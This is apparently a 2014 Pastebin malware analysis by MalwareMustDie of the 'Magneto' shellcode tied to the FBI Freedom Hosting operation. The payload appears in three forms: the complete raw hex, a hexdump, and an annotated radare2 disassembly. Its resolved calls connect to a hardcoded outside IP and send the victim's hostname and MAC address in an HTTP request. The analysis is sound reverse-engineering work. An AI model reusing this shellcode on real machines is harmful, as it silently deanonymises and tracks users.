SHARE
TWEET

Freedom Hosting FBI Shellcode Payload..

MalwareMustDie Aug 12th, 2014 5,968 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie!
  2. # Cracking Magneto (FBI Freedom Hosting Payload malware)
  3. # by @unixfreaxjp using r2 (r2 rocks!)
  4. # decode the function f(var15,view,var16) in malware infector Javascript code in http://pastebin.com/RTwsyrH8
  5. # grabbed from evil IFRAMER Javascript in http://pastebin.com/bu2Ya0n6
  6. # (above URL achieved by hard work of MMD DE)
  7. # Analysis method::
  8. # Extract the value check the hex w/parse into script in
  9. # https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/
  10. # correct result of the bins:
  11.  
  12. [0x00000226]> !vt check ./magneto.payload.shellcode
  13. -----------------------------------------------------------
  14. VT-shell 1.1 FreeBSD version - by @unixfreaxjp
  15. -----------------------------------------------------------
  16. Sample : ./magneto.payload.shellcode
  17. MD5    : 7655cb3af1869988edf698e0ea665c27
  18. SHA256 : 74414c3397dc0de10fbe0adedb7f033028fe4bb57ac4f51784a6df1a7b0114f0
  19. URL    : https://www.virustotal.com/latest-scan/74414c3397dc0de10fbe0adedb7f033028fe4bb57ac4f51784a6df1a7b0114f0
  20. -----------------------------------------------------------
  21.  
  22. // Bins info:
  23. file    magneto.payload.shellcode
  24. fd      10
  25. size    0x3bc
  26. mode    r--
  27. block   0x7d0
  28.  
  29. // hex raw:
  30. 60FCE88A0000006089E531D2648B52308B520C8B52148B72280FB74A2631FF31C0AC3C617C022C20C1CF0D01C7E2F
  31. 052578B52108B423C01D08B407885C0744A01D0508B48188B582001D3E33C498B348B01D631FF31C0ACC1CF0D01C7
  32. 38E075F4037DF83B7D2475E2588B582401D3668B0C4B8B581C01D38B048B01D0894424245B5B61595A51FFE0585F5
  33. A8B12EB86055D81BDE90200004745542075708D85D102000050684C772607FFD585C0745E8D85D802000050684C77
  34. 2607FFD585C0744CBB9001000029DC54536829806B00FFD501DC85C07536505050504050405068EA0FDFE0FFD531D
  35. BF7D339C3741F89C36A108DB5E102000056536899A57461FFD585C0741FFE8D8900000075E380BD4F020000017407
  36. E83B010000EB05E84D010000FFE7B80001000029C489E252505268B649DE01FFD55F81C40001000085C00F85F2000
  37. 00057E8F90000005E89CA8DBDE9020000E8EB0000004F83FA207C05BA2000000089D156F3A4B90D0000008DB5C402
  38. 0000F3A489BD4B0200005E5668A9283480FFD585C00F84AA000000668B480A6683F9040F829C0000008D400C8B008
  39. B088B09B8000100005089E729C489E657565151684872D2B8FFD585C081C4040100000FB70F83F906726CB9060000
  40. 00B81000000029C489E789CAD1E2505231D28A1688D024F0C0E8043C0977040430EB02043788074788D0240F3C097
  41. 7040430EB02043788074746E2D45929CF89FE5801C48BBD4B020000F3A4C6854F02000001E82E00000031C0505129
  42. CF4F575368C2EB385FFFD55368756E4D61FFD5E9C8FEFFFF31C9F7D131C0F2AEF7D149C300000000008DBDE902000
  43. 0E8E4FFFFFF4FB94F0000008DB575020000F3A48DBDE9020000E8CBFFFFFFC30D0A436F6E6E656374696F6E3A206B
  44. 6565702D616C6976650D0A4163636570743A202A2F2A0D0A4163636570742D456E636F64696E673A20677A69700D0
  45. A0D0A0083C70E31C9F7D131C0F3AE4FFFE70D0A436F6F6B69653A2049443D7773325F3332004950484C5041504900
  46. 0200005041DECA36474554202F30356365613464652D393531642D343033372D626638662D6636393035356232373
  47. 9626220485454502F312E310D0A486F73743A20000000000000000000000000000000000000000000000000000000
  48. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  49. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  50. 0000000000000000000000000000000000000000000000000090
  51.  
  52. # I save it:
  53. -rwxr--r--   mmd mmd 956 Aug 13 05:01 magneto.payload.shellcode*
  54.  
  55. # view it with the hexbins and you will get some idea:
  56. 0000   60 FC E8 8A 00 00 00 60 89 E5 31 D2 64 8B 52 30    `......`..1.d.R0
  57. 0010   8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31    .R..R..r(..J&1.1
  58. 0020   C0 AC 3C 61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F0 52    ..<a|., .......R
  59. 0030   57 8B 52 10 8B 42 3C 01 D0 8B 40 78 85 C0 74 4A    W.R..B<...@x..tJ
  60. 0040   01 D0 50 8B 48 18 8B 58 20 01 D3 E3 3C 49 8B 34    ..P.H..X ...<I.4
  61. 0050   8B 01 D6 31 FF 31 C0 AC C1 CF 0D 01 C7 38 E0 75    ...1.1.......8.u
  62. 0060   F4 03 7D F8 3B 7D 24 75 E2 58 8B 58 24 01 D3 66    ..}.;}$u.X.X$..f
  63. 0070   8B 0C 4B 8B 58 1C 01 D3 8B 04 8B 01 D0 89 44 24    ..K.X.........D$
  64. 0080   24 5B 5B 61 59 5A 51 FF E0 58 5F 5A 8B 12 EB 86    $[[aYZQ..X_Z....
  65. 0090   05 5D 81 BD E9 02 00 00 47 45 54 20 75 70 8D 85    .]......GET up..  <==="GET"
  66. 00A0   D1 02 00 00 50 68 4C 77 26 07 FF D5 85 C0 74 5E    ....PhLw&.....t^
  67. 00B0   8D 85 D8 02 00 00 50 68 4C 77 26 07 FF D5 85 C0    ......PhLw&.....
  68. 00C0   74 4C BB 90 01 00 00 29 DC 54 53 68 29 80 6B 00    tL.....).TSh).k.
  69. 00D0   FF D5 01 DC 85 C0 75 36 50 50 50 50 40 50 40 50    ......u6PPPP@P@P
  70. 00E0   68 EA 0F DF E0 FF D5 31 DB F7 D3 39 C3 74 1F 89    h......1...9.t..
  71. 00F0   C3 6A 10 8D B5 E1 02 00 00 56 53 68 99 A5 74 61    .j.......VSh..ta
  72. 0100   FF D5 85 C0 74 1F FE 8D 89 00 00 00 75 E3 80 BD    ....t.......u...
  73. 0110   4F 02 00 00 01 74 07 E8 3B 01 00 00 EB 05 E8 4D    O....t..;......M
  74. 0120   01 00 00 FF E7 B8 00 01 00 00 29 C4 89 E2 52 50    ..........)...RP
  75. 0130   52 68 B6 49 DE 01 FF D5 5F 81 C4 00 01 00 00 85    Rh.I...._.......
  76. 0140   C0 0F 85 F2 00 00 00 57 E8 F9 00 00 00 5E 89 CA    .......W.....^..
  77. 0150   8D BD E9 02 00 00 E8 EB 00 00 00 4F 83 FA 20 7C    ...........O.. |
  78. 0160   05 BA 20 00 00 00 89 D1 56 F3 A4 B9 0D 00 00 00    .. .....V.......
  79. 0170   8D B5 C4 02 00 00 F3 A4 89 BD 4B 02 00 00 5E 56    ..........K...^V
  80. 0180   68 A9 28 34 80 FF D5 85 C0 0F 84 AA 00 00 00 66    h.(4...........f
  81. 0190   8B 48 0A 66 83 F9 04 0F 82 9C 00 00 00 8D 40 0C    .H.f..........@.
  82. 01A0   8B 00 8B 08 8B 09 B8 00 01 00 00 50 89 E7 29 C4    ...........P..).
  83. 01B0   89 E6 57 56 51 51 68 48 72 D2 B8 FF D5 85 C0 81    ..WVQQhHr.......
  84. 01C0   C4 04 01 00 00 0F B7 0F 83 F9 06 72 6C B9 06 00    ...........rl...
  85. 01D0   00 00 B8 10 00 00 00 29 C4 89 E7 89 CA D1 E2 50    .......).......P
  86. 01E0   52 31 D2 8A 16 88 D0 24 F0 C0 E8 04 3C 09 77 04    R1.....$....<.w.
  87. 01F0   04 30 EB 02 04 37 88 07 47 88 D0 24 0F 3C 09 77    .0...7..G..$.<.w
  88. 0200   04 04 30 EB 02 04 37 88 07 47 46 E2 D4 59 29 CF    ..0...7..GF..Y).
  89. 0210   89 FE 58 01 C4 8B BD 4B 02 00 00 F3 A4 C6 85 4F    ..X....K.......O
  90. 0220   02 00 00 01 E8 2E 00 00 00 31 C0 50 51 29 CF 4F    .........1.PQ).O
  91. 0230   57 53 68 C2 EB 38 5F FF D5 53 68 75 6E 4D 61 FF    WSh..8_..ShunMa.
  92. 0240   D5 E9 C8 FE FF FF 31 C9 F7 D1 31 C0 F2 AE F7 D1    ......1...1.....
  93. 0250   49 C3 00 00 00 00 00 8D BD E9 02 00 00 E8 E4 FF    I...............
  94. 0260   FF FF 4F B9 4F 00 00 00 8D B5 75 02 00 00 F3 A4    ..O.O.....u.....
  95. 0270   8D BD E9 02 00 00 E8 CB FF FF FF C3 0D 0A 43 6F    ..............Co <=== "HTTP headers"
  96. 0280   6E 6E 65 63 74 69 6F 6E 3A 20 6B 65 65 70 2D 61    nnection: keep-a
  97. 0290   6C 69 76 65 0D 0A 41 63 63 65 70 74 3A 20 2A 2F    live..Accept: */
  98. 02A0   2A 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69    *..Accept-Encodi
  99. 02B0   6E 67 3A 20 67 7A 69 70 0D 0A 0D 0A 00 83 C7 0E    ng: gzip........
  100. 02C0   31 C9 F7 D1 31 C0 F3 AE 4F FF E7 0D 0A 43 6F 6F    1...1...O....Coo <=== "Cookie...."
  101. 02D0   6B 69 65 3A 20 49 44 3D 77 73 32 5F 33 32 00 49    kie: ID=ws2_32.I
  102. 02E0   50 48 4C 50 41 50 49 00 02 00 00 50 41 DE CA 36    PHLPAPI....PA..6 <=== "IPHLPAPI.DLL trace...to what call??"
  103. 02F0   47 45 54 20 2F 30 35 63 65 61 34 64 65 2D 39 35    GET /05cea4de-95 <=== "Path URL & HTTP/1.1 used.."
  104. 0300   31 64 2D 34 30 33 37 2D 62 66 38 66 2D 66 36 39    1d-4037-bf8f-f69
  105. 0310   30 35 35 62 32 37 39 62 62 20 48 54 54 50 2F 31    055b279bb HTTP/1
  106. 0320   2E 31 0D 0A 48 6F 73 74 3A 20 00 00 00 00 00 00    .1..Host: ...... <=== "to bin encoded Host..."
  107. 0330   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  108. 0340   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  109. 0350   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  110. 0360   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  111. 0370   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  112. 0380   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  113. 0390   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  114. 03A0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  115. 03B0   00 00 00 00 00 00 00 00 00 00 00 90                ............
  116.  
  117. # I am using radare to break the opcodes..and manually trailed the flow & translating WinAPI calls.
  118. # below is the positive result, there are some mistery left, like data after http request string, is excluded.
  119. [0x00000000]> b 2000
  120. [0x00000000]> pd
  121. Do you want to print 199415 chars? (y/N)
  122.             0x00000000    60           pushad
  123.             0x00000001    fc           cld
  124.             0x00000002    e88a000000   call 0x91
  125.                0x00000091(unk)
  126.             0x00000007    60           pushad
  127.             0x00000008    89e5         mov ebp, esp
  128.             0x0000000a    31d2         xor edx, edx
  129.             0x0000000c    648b5230     mov edx, [fs:edx+0x30]
  130.             0x00000010    8b520c       mov edx, [edx+0xc]
  131.             0x00000013    8b5214       mov edx, [edx+0x14]
  132.    .------> 0x00000016    8b7228       mov esi, [edx+0x28]
  133.    |        0x00000019    0fb74a26     movzx ecx, word [edx+0x26]
  134.    |        0x0000001d    31ff         xor edi, edi
  135.    |   .--> 0x0000001f    31c0         xor eax, eax
  136.    |   |    0x00000021    ac           lodsb
  137.    |   |    0x00000022    3c61         cmp al, 0x61
  138.    |   |,=< 0x00000024    7c02         jl 0x28
  139.    |   ||   0x00000026    2c20         sub al, 0x20
  140.    |   |`-> 0x00000028    c1cf0d       ror edi, 0xd
  141.    |   |    0x0000002b    01c7         add edi, eax
  142.    |   `==< 0x0000002d    e2f0         loop 0x10000001f
  143.    |        0x0000002f    52           push edx
  144.    |        0x00000030    57           push edi
  145.    |        0x00000031    8b5210       mov edx, [edx+0x10]
  146.    |        0x00000034    8b423c       mov eax, [edx+0x3c]
  147.    |        0x00000037    01d0         add eax, edx
  148.    |        0x00000039    8b4078       mov eax, [eax+0x78]
  149.    |        0x0000003c    85c0         test eax, eax
  150.    |  ,===< 0x0000003e    744a         jz 0x8a
  151.    |  |     0x00000040    01d0         add eax, edx
  152.    |  |     0x00000042    50           push eax
  153.    |  |     0x00000043    8b4818       mov ecx, [eax+0x18]
  154.    |  |     0x00000046    8b5820       mov ebx, [eax+0x20]
  155.    |  |     0x00000049    01d3         add ebx, edx
  156.    |.-----> 0x0000004b    e33c         jecxz 0x89
  157.    || |     0x0000004d    49           dec ecx
  158.    || |     0x0000004e    8b348b       mov esi, [ebx+ecx*4]
  159.    || |     0x00000051    01d6         add esi, edx
  160.    || |     0x00000053    31ff         xor edi, edi
  161.    ||.----> 0x00000055    31c0         xor eax, eax
  162.    ||||     0x00000057    ac           lodsb
  163.    ||||     0x00000058    c1cf0d       ror edi, 0xd
  164.    ||||     0x0000005b    01c7         add edi, eax
  165.    ||||     0x0000005d    38e0         cmp al, ah
  166.    ||`====< 0x0000005f    75f4         jnz 0x100000055
  167.    || |     0x00000061    037df8       add edi, [ebp-0x8]
  168.    || |     0x00000064    3b7d24       cmp edi, [ebp+0x24]
  169.    |`=====< 0x00000067    75e2         jnz 0x10000004b
  170.    |  |     0x00000069    58           pop eax
  171.    |  |     0x0000006a    8b5824       mov ebx, [eax+0x24]
  172.    |  |     0x0000006d    01d3         add ebx, edx
  173.    |  |     0x0000006f    668b0c4b     mov cx, [ebx+ecx*2]
  174.    |  |     0x00000073    8b581c       mov ebx, [eax+0x1c]
  175.    |  |     0x00000076    01d3         add ebx, edx
  176.    |  |     0x00000078    8b048b       mov eax, [ebx+ecx*4]
  177.    |  |     0x0000007b    01d0         add eax, edx
  178.    |  |     0x0000007d    89442424     mov [esp+0x24], eax
  179.    |  |     0x00000081    5b           pop ebx
  180.    |  |     0x00000082    5b           pop ebx
  181.    |  |     0x00000083    61           popad
  182.    |  |     0x00000084    59           pop ecx
  183.    |  |     0x00000085    5a           pop edx
  184.    |  |     0x00000086    51           push ecx
  185.    |  |     0x00000087    ffe0         jmp eax
  186.    |  |     0x00000089    58           pop eax
  187.    |  `---> 0x0000008a    5f           pop edi
  188.    |        0x0000008b    5a           pop edx
  189.    |        0x0000008c    8b12         mov edx, [edx]
  190.    `======< 0x0000008e    eb86         jmp 0x100000016
  191.             0x00000090    055d81bde9   add eax, 0xe9bd815d
  192.             0x00000095    0200         add al, [eax]
  193.             0x00000097    004745       add [edi+0x45], al
  194.             0x0000009a    54           push esp
  195.             0x0000009b    207570       and [ebp+0x70], dh
  196.             0x0000009e    8d85d1020000 lea eax, [ebp+0x2d1] ; ASCII "ws2_32"
  197.             0x000000a4    50           push eax
  198.             0x000000a5    684c772607   push 0x726774c ; 0x0726774c ; "LoadLibraryA@KERNEL32.DLL (Import, Hidden, 1 Params)"
  199.             0x000000aa    ffd5         call ebp
  200.                0x00000000(unk, unk, unk, unk, unk, unk, unk, unk)
  201.             0x000000ac    85c0         test eax, eax
  202.   ,=======< 0x000000ae    745e         jz 0x10e
  203.   |         0x000000b0    8d85d8020000 lea eax, [ebp+0x2d8] ;   ASCII "IPHLPAPI"
  204.   |         0x000000b6    50           push eax
  205.   |         0x000000b7    684c772607   push 0x726774c ; 0x0726774c ; "LoadLibraryA@KERNEL32.DLL (Import, Hidden, 1 Params)"
  206.   |         0x000000bc    ffd5         call ebp
  207.   |            0x00000000(unk, unk)
  208.   |         0x000000be    85c0         test eax, eax
  209.   ========< 0x000000c0    744c         jz 0x10e
  210.   |         0x000000c2    bb90010000   mov ebx, 0x190
  211.   |         0x000000c7    29dc         sub esp, ebx
  212.   |         0x000000c9    54           push esp
  213.   |         0x000000ca    53           push ebx
  214.   |         0x000000cb    6829806b00   push 0x6b8029 ; 0x006b8029 ; "WSAStartupA@WS2_32.DLL"
  215.   |         0x000000d0    ffd5         call ebp
  216.   |            0x00000000(unk, unk, unk)
  217.   |         0x000000d2    01dc         add esp, ebx
  218.   |         0x000000d4    85c0         test eax, eax
  219.   ========< 0x000000d6    7536         jnz 0x10e
  220.   |         0x000000d8    50           push eax
  221.   |         0x000000d9    50           push eax
  222.   |         0x000000da    50           push eax
  223.   |         0x000000db    50           push eax
  224.   |         0x000000dc    40           inc eax
  225.   |         0x000000dd    50           push eax
  226.   |         0x000000de    40           inc eax
  227.   |         0x000000df    50           push eax
  228.   |         0x000000e0    68ea0fdfe0   push 0xe0df0fea ; 0xe0df0fea ; "WSASocketA@WS2_32.DLL (Import, Hidden, 6 Params)"
  229.   |         0x000000e5    ffd5         call ebp
  230.   |            0x00000000(unk, unk, unk, unk, unk, unk, unk)
  231.   |         0x000000e7    31db         xor ebx, ebx
  232.   |         0x000000e9    f7d3         not ebx
  233.   |         0x000000eb    39c3         cmp ebx, eax
  234.   ========< 0x000000ed    741f         jz 0x10e
  235.   |         0x000000ef    89c3         mov ebx, eax
  236.   --------> 0x000000f1    6a10         push 0x10 ; 0x00000010 ; the length, why it has to be this specific??
  237.   |         0x000000f3    8db5e1020000 lea esi, [ebp+0x2e1] ; struct sockaddr_in { AF_INET, "80", "65.222.202.54" }
  238.                                                                                 ^^^^^^^^^^^^^^^^^^ 2nd Callback is here!
  239.   |         0x000000f9    56           push esi ; sockaddr
  240.   |         0x000000fa    53           push ebx ; socket
  241.   |         0x000000fb    6899a57461   push 0x6174a599 ; 0x6174a599 ; "connect@WS2_32.DLL (Import, Hidden, 3 Params)"
  242.   |         0x00000100    ffd5         call ebp
  243.   |            0x00000000(unk, unk, unk, unk)
  244.   |         0x00000102    85c0         test eax, eax ; executed all of the opening connection part,to that IP, boom!!
  245.   ========< 0x00000104    741f         jz 0x125
  246.   |         0x00000106    fe8d89000000 dec byte [ebp+0x89] ; 5
  247.   ========< 0x0000010c    75e3         jnz 0x1000000f1
  248.   `-------> 0x0000010e    80bd4f02000. cmp byte [ebp+0x24f], 0x1
  249.   ========< 0x00000115    7407         jz 0x11e
  250.             0x00000117    e83b010000   call 0x257
  251.                0x00000257()
  252.   ========< 0x0000011c    eb05         jmp 0x123
  253.   --------> 0x0000011e    e84d010000   call 0x270
  254.   -------->    0x00000270()
  255.   --------> 0x00000123    ffe7         jmp edi
  256.   --------> 0x00000125    b800010000   mov eax, 0x100
  257.             0x0000012a    29c4         sub esp, eax
  258.             0x0000012c    89e2         mov edx, esp
  259.             0x0000012e    52           push edx
  260.             0x0000012f    50           push eax
  261.             0x00000130    52           push edx       ; below is where the hostname is grabbed↓
  262.             0x00000131    68b649de01   push 0x1de49b6 ; 0x01de49b6 ; "gethostname@WS2_32.DLL (Import, Hidden, 2 Params)"
  263.             0x00000136    ffd5         call ebp
  264.                0x00000000(unk, unk, unk, unk)
  265.             0x00000138    5f           pop edi
  266.             0x00000139    81c400010000 add esp, 0x100
  267.             0x0000013f    85c0         test eax, eax ; poc of execution for above codes.
  268.   ========< 0x00000141    0f85f2000000 jnz 0x239
  269.             0x00000147    57           push edi
  270.             0x00000148    e8f9000000   call 0x246 ; strlen(gethostname);
  271.                0x00000246(unk)
  272.             0x0000014d    5e           pop esi
  273.             0x0000014e    89ca         mov edx, ecx
  274.             0x00000150    8dbde9020000 lea edi, [ebp+0x2e9]
  275.             0x00000156    e8eb000000   call 0x246 ; // shift to last of HTTP request string..question is why?--(3)
  276.                0x00000246()
  277.             0x0000015b    4f           dec edi
  278.             0x0000015c    83fa20       cmp edx, 0x20
  279.   ========< 0x0000015f    7c05         jl 0x166
  280.             0x00000161    ba20000000   mov edx, 0x20
  281.   --------> 0x00000166    89d1         mov ecx, edx
  282.             0x00000168    56           push esi
  283.             0x00000169    f3a4         rep movsb
  284.             0x0000016b    b90d000000   mov ecx, 0xd         ; below is how the cookie data will be checked (compared)
  285.             0x00000170    8db5c4020000 lea esi, [ebp+0x2c4] ; "\r\nCookie: ID="
  286.             0x00000176    f3a4         rep movsb
  287.             0x00000178    89bd4b020000 mov [ebp+0x24b], edi
  288.             0x0000017e    5e           pop esi
  289.             0x0000017f    56           push esi        ; below is the check of host
  290.             0x00000180    68a9283480   push 0x803428a9 ; 0x803428a9 ; "gethostbyname@WS2_32.DLL (Import, Hidden, 1 Params)"
  291.             0x00000185    ffd5         call ebp
  292.                0x00000000(unk, unk, unk)
  293.             0x00000187    85c0         test eax, eax ; PoC of the execution of above codes.
  294.   ========< 0x00000189    0f84aa000000 jz 0x239
  295.             0x0000018f    668b480a     mov cx, [eax+0xa]
  296.             0x00000193    6683f904     cmp cx, 0x4
  297.   ========< 0x00000197    0f829c000000 jb 0x239
  298.             0x0000019d    8d400c       lea eax, [eax+0xc]
  299.             0x000001a0    8b00         mov eax, [eax]
  300.             0x000001a2    8b08         mov ecx, [eax]
  301.             0x000001a4    8b09         mov ecx, [ecx]
  302.             0x000001a6    b800010000   mov eax, 0x100
  303.             0x000001ab    50           push eax
  304.             0x000001ac    89e7         mov edi, esp
  305.             0x000001ae    29c4         sub esp, eax
  306.             0x000001b0    89e6         mov esi, esp
  307.             0x000001b2    57           push edi
  308.             0x000001b3    56           push esi
  309.             0x000001b4    51           push ecx
  310.             0x000001b5    51           push ecx                     ; this↓ is ARP sending function w/sending TCP/IP
  311.             0x000001b6    684872d2b8   push 0xb8d27248 ; 0xb8d27248 ;"SendARP@IPHLPAPI.DLL" <==now we know where MAcADDR from
  312.             0x000001bb    ffd5         call ebp
  313.                0x00000000(unk, unk, unk, unk, unk, unk)
  314.             0x000001bd    85c0         test eax, eax ; this code is a poc of an execution, boom!!
  315.             0x000001bf    81c404010000 add esp, 0x104
  316.             0x000001c5    0fb70f       movzx ecx, word [edi]
  317.             0x000001c8    83f906       cmp ecx, 0x6
  318.   ========< 0x000001cb    726c         jb 0x239
  319.             0x000001cd    b906000000   mov ecx, 0x6
  320.             0x000001d2    b810000000   mov eax, 0x10
  321.             0x000001d7    29c4         sub esp, eax
  322.             0x000001d9    89e7         mov edi, esp
  323.             0x000001db    89ca         mov edx, ecx
  324.             0x000001dd    d1e2         shl edx, 1
  325.             0x000001df    50           push eax
  326.             0x000001e0    52           push edx
  327.   --------> 0x000001e1    31d2         xor edx, edx
  328.             0x000001e3    8a16         mov dl, [esi]
  329.             0x000001e5    88d0         mov al, dl
  330.             0x000001e7    24f0         and al, 0xf0
  331.             0x000001e9    c0e804       shr al, 0x4
  332.             0x000001ec    3c09         cmp al, 0x9
  333.   ========< 0x000001ee    7704         ja 0x1f4
  334.             0x000001f0    0430         add al, 0x30
  335.   ========< 0x000001f2    eb02         jmp 0x1f6
  336.   --------> 0x000001f4    0437         add al, 0x37
  337.   --------> 0x000001f6    8807         mov [edi], al
  338.             0x000001f8    47           inc edi
  339.             0x000001f9    88d0         mov al, dl
  340.             0x000001fb    240f         and al, 0xf
  341.             0x000001fd    3c09         cmp al, 0x9
  342.   ========< 0x000001ff    7704         ja 0x205
  343.             0x00000201    0430         add al, 0x30
  344.   ========< 0x00000203    eb02         jmp 0x207
  345.   --------> 0x00000205    0437         add al, 0x37
  346.   --------> 0x00000207    8807         mov [edi], al
  347.             0x00000209    47           inc edi
  348.             0x0000020a    46           inc esi
  349.   ========< 0x0000020b    e2d4         loop 0x1000001e1
  350.             0x0000020d    59           pop ecx
  351.             0x0000020e    29cf         sub edi, ecx
  352.             0x00000210    89fe         mov esi, edi
  353.             0x00000212    58           pop eax
  354.             0x00000213    01c4         add esp, eax
  355.             0x00000215    8bbd4b020000 mov edi, [ebp+0x24b]
  356.             0x0000021b    f3a4         rep movsb
  357.             0x0000021d    c6854f02000. mov byte [ebp+0x24f], 0x1
  358.             0x00000224    e82e000000   call 0x257 ; get "Connection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n"
  359.                0x00000257(unk, unk)
  360.             0x00000229    31c0         xor eax, eax
  361.             0x0000022b    50           push eax
  362.             0x0000022c    51           push ecx
  363.             0x0000022d    29cf         sub edi, ecx
  364.             0x0000022f    4f           dec edi
  365.             0x00000230    57           push edi
  366.             0x00000231    53           push ebx
  367.             0x00000232    68c2eb385f   push 0x5f38ebc2 ; 0x5f38ebc2 ; "send@WS2_32.DLL (Import, Hidden, 4 Params)"
  368.             0x00000237    ffd5         call ebp
  369.                0x00000000(unk, unk, unk, unk, unk)
  370.   --------> 0x00000239    53           push ebx
  371.             0x0000023a    68756e4d61   push 0x614d6e75 ; 0x614d6e75 ; "closesocket@WS2_32.DLL (Import, Hidden, 1 Params)"
  372.             0x0000023f    ffd5         call ebp
  373.                0x00000000(unk, unk)
  374.   ========< 0x00000241    e9c8feffff   jmp 0x10000010e
  375.             0x00000246    31c9         xor ecx, ecx
  376.             0x00000248    f7d1         not ecx
  377.             0x0000024a    31c0         xor eax, eax
  378.             0x0000024c    f2ae         repne scasb
  379.             0x0000024e    f7d1         not ecx
  380.             0x00000250    49           dec ecx
  381.             0x00000251    c3           ret
  382.             0x00000252    0000         add [eax], al
  383.             0x00000254    0000         add [eax], al
  384.             0x00000256    008dbde90200 add [ebp+0x2e9bd], cl
  385.             0x0000025c    00e8         add al, ch
  386.             0x0000025e    e4ff         in al, 0xff
  387.             0x00000260    ff           invalid
  388.             0x00000261    ff4fb9       dec dword [edi-0x47]
  389.             0x00000264    4f           dec edi
  390.             0x00000265    0000         add [eax], al
  391.             0x00000267    008db5750200 add [ebp+0x275b5], cl
  392.             0x0000026d    00f3         add bl, dh
  393.             0x0000026f    a4           movsb
  394.             0x00000270    8dbde9020000 lea edi, [ebp+0x2e9]
  395.             0x00000276    e8cbffffff   call 0x100000246
  396.                0x00000246()
  397.             0x0000027b    c3           ret
  398.             0x0000027c    0d0a436f6e   or eax, 0x6e6f430a
  399.             0x00000281    6e           outsb
  400.             0x00000282    656374696f   arpl [gs:ecx+ebp*2+0x6f], si
  401.             0x00000287    6e           outsb
  402.             0x00000288    3a20         cmp ah, [eax]
  403.             0x0000028a    6b656570     imul esp, [ebp+0x65], 0x70
  404.             0x0000028e    2d616c6976   sub eax, 0x76696c61
  405.             0x00000293    650d0a416363 or eax, 0x6363410a
  406.         ,=< 0x00000299    657074       jo 0x310
  407.         |   0x0000029c    3a20         cmp ah, [eax]
  408.         |   0x0000029e    2a2f         sub ch, [edi]
  409.         |   0x000002a0    2a0d0a416363 sub cl, [0x6363410a]
  410.        ,==< 0x000002a6    657074       jo 0x31d
  411.        ||   0x000002a9    2d456e636f   sub eax, 0x6f636e45
  412.        ||   0x000002ae    64696e673a2. imul ebp, [fs:esi+0x67], 0x7a67203a
  413.        ||   0x000002b6    69700d0a0d0. imul esi, [eax+0xd], 0xa0d0a
  414.        ||   0x000002bd    83c70e       add edi, 0xe
  415.        ||   0x000002c0    31c9         xor ecx, ecx
  416.        ||   0x000002c2    f7d1         not ecx
  417.        ||   0x000002c4    31c0         xor eax, eax
  418.        ||   0x000002c6    f3ae         repe scasb
  419.        ||   0x000002c8    4f           dec edi
  420.        ||   0x000002c9    ffe7         jmp edi
  421.        ||   0x000002cb    0d0a436f6f   or eax, 0x6f6f430a
  422.        ||   0x000002d0    6b69653a     imul ebp, [ecx+0x65], 0x3a
  423.        ||   0x000002d4    204944       and [ecx+0x44], cl
  424.        ||   0x000002d7    3d7773325f   cmp eax, 0x5f327377
  425.        ||   0x000002dc    3332         xor esi, [edx]
  426.        ||   0x000002de    004950       add [ecx+0x50], cl
  427.        ||   0x000002e1    48           dec eax
  428.        ||   0x000002e2    4c           dec esp
  429.        ||   0x000002e3    50           push eax
  430.        ||   0x000002e4    41           inc ecx
  431.        ||   0x000002e5    50           push eax
  432.        ||   0x000002e6    49           dec ecx
  433.        ||   0x000002e7    0002         add [edx], al
  434.        ||   0x000002e9    0000         add [eax], al
  435.        ||   0x000002eb    50           push eax
  436.        ||   0x000002ec    41           inc ecx
  437.        ||   0x000002ed    deca         fmulp st2, st0
  438.        ||   0x000002ef    3647         inc edi
  439.        ||   0x000002f1    45           inc ebp
  440.        ||   0x000002f2    54           push esp
  441.        ||   0x000002f3    202f         and [edi], ch
  442.        ||   0x000002f5    303563656134 xor [0x34616563], dh
  443.        ||   0x000002fb    64652d39353. sub eax, 0x64313539
  444.        ||   0x00000302    2d34303337   sub eax, 0x37333034
  445.        ||   0x00000307    2d62663866   sub eax, 0x66386662
  446.        ||   0x0000030c    2d66363930   sub eax, 0x30393666
  447.        |    0x00000311    3535623237   xor eax, 0x37326235
  448.        |    0x00000316    396262       cmp [edx+0x62], esp
  449.        |    0x00000319    204854       and [eax+0x54], cl
  450.        |    0x0000031c    54           push esp
  451.        `--> 0x0000031d    50           push eax
  452.             0x0000031e    2f           das
  453.             0x0000031f    312e         xor [esi], ebp
  454.             0x00000321    310d0a486f73 xor [0x736f480a], ecx
  455.       ,===< 0x00000327    743a         jz 0x363
  456.       |     0x00000329    2000         and [eax], al
  457.       |     0x0000032b    0000         add [eax], al
  458.       |     0x0000032d    0000         add [eax], al
  459.       |     0x0000032f    0000         add [eax], al
  460.       |     0x00000331    0000         add [eax], al
  461.       |     0x00000333    0000         add [eax], al
  462.       |     0x00000335    0000         add [eax], al
  463.       |     0x00000337    0000         add [eax], al
  464.       |     0x00000339    0000         add [eax], al
  465.       |     0x0000033b    0000         add [eax], al
  466.       |     0x0000033d    0000         add [eax], al
  467.       |     0x0000033f    0000         add [eax], al
  468.       |     0x00000341    0000         add [eax], al
  469.       |     0x00000343    0000         add [eax], al
  470.       |     0x00000345    0000         add [eax], al
  471.       |     0x00000347    0000         add [eax], al
  472.       |     0x00000349    0000         add [eax], al
  473.       |     0x0000034b    0000         add [eax], al
  474.       |     0x0000034d    0000         add [eax], al
  475.       |     0x0000034f    0000         add [eax], al
  476.       |     0x00000351    0000         add [eax], al
  477.       |     0x00000353    0000         add [eax], al
  478.       |     0x00000355    0000         add [eax], al
